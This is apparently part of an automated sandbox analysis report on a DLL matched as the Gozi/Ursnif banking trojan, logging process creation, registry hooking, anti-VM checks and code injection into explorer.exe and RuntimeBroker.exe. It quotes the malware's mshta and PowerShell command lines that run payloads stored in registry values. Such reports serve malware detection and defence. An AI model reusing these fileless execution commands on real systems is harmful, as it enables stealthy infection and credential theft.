          Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine, Classification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/4
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_033F31DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification
          Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8F499AAE-6FE9-11EB-90EB-ECF4BBEA1588}.dat
          Source: C:\Windows\System32\rundll32.exe, Mutant created: \Sessions\1\BaseNamedObjects\{FE45D668-45B5-E0A5-BF12-491463668D88}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\{F61F46FF-DD96-98AA-178A-614C3B5E2540}
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_01
          Source: C:\Windows\System32\control.exe, Mutant created: \Sessions\1\BaseNamedObjects\{3E959709-853B-20F7-FF52-8954A3A6CDC8}
          Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Temp\~DF7FAEED37798869B9.TMP
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Program Files\internet explorer\iexplore.exe, File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll, Virustotal: Detection: 16%
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll, ReversingLabs: Detection: 10%
          Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll'
          Source: unknown, Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: unknown, Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
          Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
          Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
          Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
          Source: unknown, Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
          Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
          Source: unknown, Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation:

          Suspicious powershell command line found
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FAF23 push ecx; ret 2_2_033FAF33
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FABF0 push ecx; ret 2_2_033FABF9
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAC115 push 3B000001h; retf 32_2_04DAC11A
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAC115 push 3B000001h; retf 33_2_00DAC11A
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433C115 push 3B000001h; retf 35_2_000001E7A433C11A
          Source: initial sampleStatic PE information: section name: .text entropy: 6.87914572387
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll

          Hooking and other Techniques for Hiding and Protection:

          Yara detected Ursnif
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
          Hooks registry keys query functions (used to hide registry keys)
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
          Modifies the export address table of user mode modules (user mode EAT hooks)
          Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
          Modifies the import address table of user mode modules (user mode IAT hooks)
          Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4964
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3735
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_033F3512
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,32_2_04DB7500
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,32_2_04DBAACC
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000020.00000000.839224347.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000020.00000002.1030805328.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          Allocates memory in foreign processes
          Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
          Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 1E7A4010000 protect: page execute and read and write
          Changes memory attributes in foreign processes to executable or writable
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Compiles code for process injection (via .Net compiler)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.0.cs
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
          Source: C:\Windows\System32\control.exeThread created: unknown EIP: BD4F1580
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9EA000 value: 00
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 3110000 value: 80
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
          Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 5528
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424
          Source: C:\Windows\explorer.exeThread register set: target process: 3656
          Source: C:\Windows\explorer.exeThread register set: target process: 4268
          Source: C:\Windows\explorer.exeThread register set: target process: 4772
          Source: C:\Windows\explorer.exeThread register set: target process: 2932
          Source: C:\Windows\explorer.exeThread register set: target process: 2388
          Source: C:\Windows\explorer.exeThread register set: target process: 1380
          Source: C:\Windows\explorer.exeThread register set: target process: 6720
          Source: C:\Windows\System32\control.exeThread register set: target process: 3424
          Source: C:\Windows\System32\control.exeThread register set: target process: 6488
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF635E612E0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9EA000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 3110000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7386879000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2179000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
